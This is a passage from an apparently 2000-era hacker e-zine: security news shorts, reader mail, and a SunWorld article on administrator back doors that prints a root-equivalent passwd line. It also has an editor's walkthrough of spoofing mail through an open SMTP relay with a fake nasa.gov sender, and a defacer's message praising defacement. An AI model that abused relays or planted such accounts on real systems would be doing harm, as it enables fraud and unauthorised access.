privacy protection for personal financial information included in a historic overhaul of Depression-era U.S. banking laws Full Story <http://www.ukhackers.com/0402008.htm> ++ Patch Available for the Recycle Bin Creation Vulnerability Contributed by Slash Microsoft has released a patch that eliminates a security vulnerability in Windows NT 4.0. This hole allows a malicious user to create, delete or modify files in the Recycle Bin of another user who shared the machine. Full Story <http://www.ukhackers.com/0402009.htm> ++ Behind the Scenes at 'Hackers, Inc.' Contributed by Slash Professional hackers roam Net to keep companies--and data--secure. Full Story <http://www.ukhackers.com/0402007.htm> ++ The Net’s Dark Side: Protecting Your Privacy May Empower Criminals Contributed by Slash Surfing the Web. You thought you knew how dangerous it could be. But many Americans might be astonished at how easy it is to uncover the most sensitive personal information. Full Story <http://www.ukhackers.com/0402006.htm> ++ RSA Security's Industry-Leading Encryption Technology Offered in OpenSite AuctionNow and OpenSite Dynamic Pricing Toolkit Contributed by Slash Full Story <http://www.ukhackers.com/0402005.htm> ++ Essential Security for DSL and Cable Modem Users Contributed by Slash Zone Labs, Inc., today announced the immediate availability of the new ZoneAlarm 2.0 Internet security utility. full Story <http://www.ukhackers.com/0402004.htm> ++ F-Secure, Hewlett Packard team up in WAP security Contributed by Slash Finnish computer security company F-Secure said on Thursday it would develop security for Internet-enabled Wireless Application Protocol (WAP) full Story <http://www.ukhackers.com/0402003.htm> ++ Experts Warn of Web Surfing Risk Contributed by Slash Computer experts are warning of a serious new Internet security threat that allows hackers to launch malicious programs on a victim's computer Full Story <http://www.ukhackers.com/0402002.htm> ++ Teen Hacker's Home Raided (Business Tuesday) http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126 The home of the 16-year-old hacker who launched three major lawsuits was raided Monday in Norway, and the international hacking community is reeling from the news. By Lynn Burke. ++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST) http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126 NSA documents refer to 'Echelon.' Is it the suspected international citizen spying machine or the name of a legal military project? The researcher who found them thinks it's the latter. By Chris Oakes. ++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST) http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203 The three-month-long hostile bid by Britain's telecom giant is finally about to end ... in a friendly takeover. ++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST) http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203 The Linux software distributor pays an estimated $850 million in stocks and cash for the network of tech-info sites, which includes the esteemed Slashdot. ++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m. PST) http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203 The controversy about Internet wiretaps -- which pitted the FBI and the FCC against the ACLU and the EFF -- has ended with a recommendation against online surveillance. Declan McCullagh reports from Washington. ++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST) http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203 BMG Germany pulls the plug on its first effort to protect CDs from piracy after customers complain that some of the music is unplayable. By Chris Oakes. ++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST) http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203 A new industry consortium thinks it has the portable answer to secure storage of music and more: a secure digital memory card. Microsoft signed on Wednesday. Look out, Sony Memory Stick. ++ Net Tax May Get the Heave-Ho (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203 It's a matter of changing one sentence in existing legislation. But if Congress approves, the threat of Internet taxation could vanish forever. Or at least for Washington's idea of forever. Declan McCullagh reports from Washington. ++ Class-Action Suit Calls on AOL (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203 A lawsuit alleges America Online's newest software disconnects users from competing online accounts. The filing requests $8 billion in damages for version 5.0 users. ++ RealNetworks Helps Pay Piper (Technology Wednesday) http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203 The Net's streaming media giant adds technology from AudioSoft to facilitate royalty payments to copyright holders. The system will count streams and send the data to the collecting agency. By Christopher Jones. ++ Virtual Training for Real Jobs (Culture Wednesday) http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203 Technology may be the cornerstone of the new economy, but people lacking skills are being shut out of the market. One Texas program is trying to get them into the game. Katie Dean reports from Austin, Texas. ++ But, How to Pronounce Dot EU? (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203 The European Commission, wanting a piece of the dot com pie, launches an initiative to give businesses on the other side of the pond a uniform suffix. -=- Security Portal News Shorts -=- ++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A <http://www.antivirus.com/vinfo/> - a Windows executable and Word macro virus respectively, both are low risk viruses, not believed to be widespread ++ ComputerWorld: Y2K gives some admins a security education <http://www.computerworld.com/home/print.nsf/all/000101D96E> - The threat of online assaults had IT staffs on guard, but midnight came and went without any serious security problems cropping up, according to experts monitoring systems ++ ZDNet: Script virus looks to ring in new year <http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdnntop > - The first virus to get its own press release in the year 2000 appears to be little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also quiet ++ Jan 1, 2000 Symantec: PWSteal.Trojan Virus <http://www.symantec.com/avcenter/venc/data/pwsteal.trojan.html> - PWSteal.Trojan is a trojan which attempts to steal login names and passwords. These passwords are often sent to an anonymous email address CNN: CA warns of Y2K-triggered virus <http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html> - CA said the "Trojan.Kill_Inst98" virus will delete all the files on an infected PC's C: drive when the system clock rolls over to Jan. 1, 2000 ++ Dec 31, 1999 NAI: Zelu Virus <http://vil.nai.com/vil/dos10505.asp> - This is an MS-DOS executable which can destroy data on the hard drive. The original filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size. If this file is run, it simulates checking the system for Y2K compliancy. It is not however doing any such thing - it is trashing files on the local system rendering the machine inoperable. Not believed to be widespread. ++ CNN: CA warns of Y2K-triggered virus <http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html> - CA said the "Trojan.Kill_Inst98" virus will delete all the files on an infected PC's C: drive when the system clock rolls over to Jan. 1, 2000 Y2K Status Update <http://securityportal.com/topnews/y2k19991231-jwr-10.html> - no news is good news ++ Sophos Virus Alert: WM97/Chantal-B <http://www.sophos.com/virusinfo/analyses/wm97chantalb.html> - WM97/Chantal-B is a Word macro virus which drops a batch file virus and a Visual Basic script trojan horse. On the 31st of any month the virus displays the Microsoft Office assistant with the message: "Y2K is Coming Soon". If the year is 2000 the virus attempts to delete all files in the current directory and in the root directory of the C: drive Sophos Virus Alert: WM97/BackHand-A <http://www.sophos.com/virusinfo/analyses/wm97backhanda.html> - If the date is Friday the 13th the virus password protects the document with the password "Trim(Two)". Then, if the year is 2000, it resets the computer's date to 1/1/1980 ++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses <http://www.cert.org/y2k-info/virus_threat_est.html> - About a dozen Y2K-related viruses have been reported, but they are not widespread. Moreover, because viruses have to be executed to operate and because most people will not be at their keyboards as the date rolls over, the likelihood of a significant virus event is low. As people return to work next week, the virus risk may increase somewhat for all types of viruses, but there is no reason to expect a major outbreak. NAI Virus listing: ExploreZip.C or Minizip III <http://vil.nai.com/vil/wm10493.asp> - This is another variant of the original W32/ExploreZip.worm distributed earlier in 1999. This version is different in that it is "localized" with Spanish error messages however will function on English Windows systems. This edition was compressed using another compression tool. Not currently rated as a high risk threat ++ Dec 30, 1999 ZDNet: Apple's OS 9 patch brings new problems <http://www.zdnet.com/zdnn/stories/news/0,4586,2415488,00.html?chkpt=zdhpnew s01> - Although many users were impressed by Apple's quick reaction this week to the discovery of a potential security flaw in Mac OS 9, those users who have applied the new OT Tuner 1.0 patch are reporting loss of all network connectivity or crashes during startup. Apple says patched machines simply need to be restarted ++ Sun Security Bulletin 192: CDE and OpenWindows <http://securityportal.com/topnews/sun19991230-192.html> - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which relate to various vulnerabilities in CDE and OpenWindows Sun Security Bulletin 191 sadmind <http://securityportal.com/topnews/sun19991230.html> - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ======================================================================== The message board is DEAD it was an experiment that failed. Perhaps i'll revive a board when I can run some good board software on our own host. Don't be shy with your email, we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking IDS, general tech questions or observations etc, hell we've even printed poetry in the past when we thought it was good enough to share.. - Ed ======================================================================= Seen on security focus: To: Security Jobs Subject: Virus coder wanted Date: Thu Jan 27 2000 00:18:44 Author: Drissel, James W. Message-ID: <CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil> Computer Sciences Corporation in San Antonio, TX is looking for a good virus coder. Applicants must be willing to work at Kelly AFB in San Antonio. Other exploit experience is helpful. Send Resumes/questions to james.drissel@cmet.af.mil -=- From: <pyr0-phreak@geeks404.com> To: <hwa@press.usmc.net> Sent: Wednesday, January 05, 2000 1:02 AM Subject: Just some comments Hello staff of HWA, Just thought i would tell u guys that u r doin a pimp ass job and if its alright i would like to put a link up on my webpage to this interesting and informative site. Mail me back plez. Pyr0-phreak@geeks404.com www.crosswinds.net/~pyr0phreak -=- From: Andrew Nutter-Upham <nutterupham@earthlink.net> To: <hwa@press.usmc.net> Sent: Sunday, January 02, 2000 9:42 PM Subject: about your site. I love the newsletter, read every edition. but your site sucks. now i don't blame you, a lot of people have problems with good site design. I do web design as a part time job, and I'd like (just to be nice, for money of course.) to redo the site, if that's ok with you, I could leach the site down, but i think it'd be easier if you could just zip it up and send it to me. if you like my revisions feel free to keep them. if not, that's ok too, i just thought that I'd put in the offer. Think it over. thanks for listening. -andy It sure does suck, its getting pretty shoddy and out dated looking, a tad ragged around the edges, i've done some minor patch-up mods to make things better but don't have time to work on it in a major way, perhaps we can get something going here... - Ed -=- From: Lascarmaster <Lascars@iquebec.com> To: <CRUCIPHUX@DOK.ORG> Sent: Monday, January 24, 2000 1:58 AM Subject: [ AD! ] Hello CRUCIPHUX, hello from France my site is a french hacker portal with some good links and news for hackers ( in french i prefer the word lascar ) by the way , if you could place this ad on your next hwa.hax0r digest, it could be very nice try my site at http://lascars.cjb.net ______________________________________________________________ French Hackers' Portal / Le Portail Des Lascars Francophones Links and News of interest / Liens et news pour lascars. ;-) -------------------------------------------------------------- ->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<- ______________________________________________________________ Le portail des Lascars c'est http://Lascars.cjb.net Lascarmaster mailto:Lascars@iquebec.com ______________________________________________________________________________ Si votre email etait sur iFrance vous pourriez ecouter ce message au tel ! http://www.ifrance.com : ne laissez plus vos emails loins de vous ... gratuit sur i France : emails (20 MO, POP, FAX), Agenda, Site perso -=- From: Dragos Ruiu <dr@v-wave.com> To: <cc: list omitted> Sent: Tuesday, January 25, 2000 9:50 PM Subject: kyxspam: IMxploits in the news (First reported in Salon huh.?... Bay Area tunnel vision is an interesting phenomenon. Has anyone made the definitive IM vulnerability and exploit page yet? As in I'M owned. --dr :-) Hack Takes Aim at AOL Clients Wired News Report 5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report. The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts. "We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL. AOL's online service is used to changed passwords, so hackers are easily able to open new accounts using the existing AIM user's name. People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL, are. D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action." "Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said. He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number." David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process. "AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected." "AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks." -- kyx.net we're from the future - home of kanga-foo! -=- From: Dragos Ruiu <dr@v-wave.com> To: <cc: list omitted> Sent: Tuesday, January 25, 2000 10:32 PM Subject: kyxspam: hacking for politics. http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-2 00-1531134 Hackers attack Japanese government sites By Reuters Special to CNET News.com January 25, 2000, 11:40 a.m. PT TOKYO--Japanese officials suffered an embarrassment today when hackers penetrated two government Web sites, leaving a message in one of them criticizing the Japanese government's position on the 1937 Nanjing Massacre. Computer systems at Japan's Management and Coordination Agency were raided yesterday, and its home page was replaced with derogatory messages insulting the Japanese in the first-ever hacking of the country's government computer system. The hackers left a message on the Web site in Chinese blasting the Japanese government for refusing to acknowledge that the Nanjing Massacre took place, media reports said. Jiji news agency said it had deciphered the message, which originally came in garbled, to read: "The Chinese people must speak up to protest the Japanese government for refusing to acknowledge the historical misdeed of the 1937 Nanjing Massacre." Hundreds and thousand of civilians were massacred by Imperial Army troops during the 1937-38 occupation of the central Chinese city. A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the incident, also called the Rape of Nanking, has whipped up new anger in China, where hundreds marched through the streets of Nanjing to denounce the conference. The Chinese government lodged protests about the gathering. But the Japanese government, which acknowledges that the incident was no fabrication as some ultrarightists claim, failed to bar the group from holding the weekend meeting. A similar hacking incident occurred on Japan's Science and Technology Agency's home page. Agency officials declined to give details of the messages but said the home page was also replaced with a direct access switch to adult magazine Web sites. Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the hacking incidents, including possible help from Washington, which is more advanced in dealing with hackers. "The government must take all necessary measures including seeking help from the United States," Aoki said at a news conference. Officials said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration. Story Copyright © 2000 Reuters Limited. All rights reserved. -- kyx.net we're from the future - home of kanga-foo! -=- From: Dragos Ruiu <dr@v-wave.com> To: <cc: list omitted> Sent: Wednesday, January 26, 2000 5:15 PM Subject: kyxspam: who watches the watchmen? (tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem skins... --dr) http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html Who gets your trust? Security breaches can come from those you least suspect Summary Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? WIZARD'S GUIDE TO SECURITY By Carole Fennelly In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed. This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything. What is a back door? Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it. In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account. A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root: auser:x:0:101:Average User :/home/auser:/bin/ksh If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole. It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways though SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge. Proprietary data A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts. In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"? System monitoring Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges. What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it. What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to. Countermeasures You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee. Background checks You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught). The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area. In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance? Technical measures Some technical software packages can limit or control superuser privileges. I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to. sudo The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description. Tripwire Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column. Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent? Professionalism The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior. During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as: No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator. All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient. Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify. Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential. The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately. Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing. All administrative procedures and tools are to be considered proprietary information and are the property of the computer center. Tape archives may not be removed from the facility without written approval. Discretion A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it. At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!) Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations. Final thoughts Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker." The only difference is the label. Disclaimer: The information and software in this article are provided as-is and should be used with caution. Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein. s About the author Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area. -- kyx.net we're from the future - home of kanga-foo! -=- 02.0 From the editor. ~~~~~~~~~~~~~~~~ _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| #include <stdio.h> #include <thoughts.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* * Yes we've wavered from our weekly release schedule, sorry * about that, i've been indulging in other projects requiring * more of my time (network IDS related etc) but you will find * pretty much full coverage of the time period Jan 16th to Feb * 12th or so included in this issue. * * I've rearranged stuff a little, i've moved some of the fodder * that i'm sure was annoying some people and definately at * at least one (grin) to the END of the newsletter, into the * appendices where it should probably have been in the first * place. So if you're looking for the gov and mil sites that * have scoured our site or want to check the FAQ or our source * or resource lists etc, they have all been moved to the back * so now you can more or less 'dive in' to the news material * and content without paging thru stuff you may have already * seen a million times. * * Also did a slight modification/clean up of the website, its * going to be redone but meanwhile i've made it a little less * cumbersome and easier to navigate. Also added a toy or two * want a user@hax0r-news.zzn.com mail address? I knew you did * (heh) well now you can, just follow the link and away you * go to yet another web based mail account...sorry appears to * be no forwarding. <beh> * * This will include alot of HNN rehashed material, i'm working * on automating the retreival of certain news sources for time * saving in creating these issues, since we have access to * other sources of info that don't get explored as often as * I'd like, also keeping up with exploits is not so difficult * now that packetstorm no longer has the contact base it once * did. If you can suggest sites that get 0-day (grin) or current * exploit code or the sites of the coders themselves, please * send in the url/list info etc so we can keep everyone up to * date. * * I shall finally be asking some help from people, I can no * longer do this by myself to my satisfaction, so I hope to * enlist some eager beavers with time to kill on this project * rather than let release dates drift further and further * apart. * * * Things are a bit messy and not necessarily in chronological * order, I don't like it but thats the way it turned out, I * really need to spend more time on this to get it organized * more neatly and make it more accessible, comments welcome. * * We need more submissions!, if you submit to security NG's or * mailing lists about exploits or security concerns that you * think may be of interest to our readers, consider CC: a copy * to me for inclusion here. I try and cover a broad spectrum * (perhaps too broad) of security/hacker related material and * as such a little help with material would be most appreciated. * * mucho props out to Zym0t1c who is contributing more and more * to the zine lately, thanks dude! * * Cruci * * cruciphux@dok.org * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) -=- Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= 03.0 Slash, Croatian cracker, speaks out ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is from one of the last defacements that Slash has done, he has since renounced defacing and is starting a new security group called b0f (Buffer Overflow) we'll keep you posted as this develops. - Ed Defaced by slash [ 2.1.2000 ] Original site here (http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html) www.badjura-petri.com - I got some interesting mail in the last few days that I want to share with You. The first one is from a Security Consultant David Hove, who works for a company named "RISCmanagment Inc." (www.riscman.com), and this is what he wrote to me in his mail : ------ Numb Nuts, Your judgments lay upon broken young souls who know no better. Let it be! Hackers will hack regardless of holes previously exploited. If the sys adm does not fix their holes this is not the issue. Hacking for fame is not the issue. You yourself mailed your hack in for recognition did you not. STOP THE HYPOCRISY AND SIMPLY HACK. Who the hell are U to dictate what should be placed on a defaced website? I personally work the other side of the fence specializing in keeping you out but thoroughly enjoy watching you and others like you go about your daily routine. Exploiting port 80, buffer overflows, running your little scripts, ect. Fuck ethics! The harder you try to hack the more aware we become as admins. For those admins who do not keep up Fuckem! David Hove Security Consultant CCSA/CCSE RISCmanagement Inc. www.riscman.com ------- Deer Mr. David, your email made me very sad because I realized that people don't get the message I'm trying to say. Hacking previously hacked sites is considered lame, and yes, hacking for fame is the issue. Hackers now adays hack only to get media attention. In my country a 16 year old Back Orifice user was raided for "hacking" a computer of a Croatian politian. The media made a national hero out of him. In the interview he said that he could hack into a bank with just two of his friends and a good computer. Now, people who read that newspaper bought the story, but people who know young Denis via IRC can confirm that he is a complete idiot an a lamer. His parents are so proud of him, not knowing that anyone can "hack" using Back Orifice. About me mailing my hack to attrition. Yes, I did mail the hack to attrition, you know why !? I deface to spread the message out. I personally think if I just deface the site that people wont notice it. So I report it to attrition and they put a mirror of the site I defaced so other people can view it too. I don't do it for the fame. I could hack under a different name everytime, but this is my style. I don't got braging on IRC "I hacked this..", "I hacked that..". I don't have to prove my skillz to anyone. People can respect me or hate me. I sincerely doubt that defacing a site will make me look better infront of my friends. Almost anyone can find himself a remote exploit and run it against the server. But not anyone can secure a Unix server, program or even make html. For me defacing is just expressing my opinion on stuff, nothing more. About 'fuck the ethics' thing. Mr. David, the ethics are here to prevent a major chaos. Without ethics people would just go around and delete anything they run into. I suggest every hacker to stick to the ethics as close as he can, hell, that's why they were written. I know people forget about them, but there are always people like me to remind hackers about the ethics. That's the balance. People don't stick to them, they life stupid messages like "I 0wn3 j00". I tell You people, that's bad. Can't You just write something. Anything, just not these stupid irritating messages. Ok, we started another discussion here. "Who the hell are U to dictate what should be placed on a defaced website?" - You say. Well, Your right. I'm nobody. I can't dictate what should be placed on a defaced website. But I can suggest people not to do it. I just suggested it, I didn't dictate or order it. "The harder you try to hack the more aware we become as admins." - Aware ?! If I deface Your site ten times, and don't tell You how I got in, You become more aware !? I damage Your company for 10.000 $ by defacing it, because people say: "How can they secure my server when they can't even secure their own." And nobody wants Your service anymore. Don't get me wrong. I'm sure You're a very good and experienced administrator, but nothing is secure enough, that hackers can't brake it. That's what we devoted Our lives to, penetrating systems. I enjoy hacking. That is really something unique. People through ages have always wanted to do something that's forbidden or illegal. Just remind Yourself of Adam & Eve, and the Heaven garden. Eve had to eat that apple alldo God gave them everything they needed, and just forbid them to eat apples from that tree. Hacking is illegal in many countries. You could get worse sentence for hacking than for murdering someone. I don't really care if I get raided. Hacking is my crime. A crime out of passion. Respect me or hate me, the choice is Yours. - Peace out, slash - Shoutouts - p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org, net-security.org, ex1t, sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs, sLina, kLick_Mi, Emptyhead, mosthated, pr1sm ,fuqraq, airWalk, [Princev], zeroeffect, and the whole BLN. - Peace to my 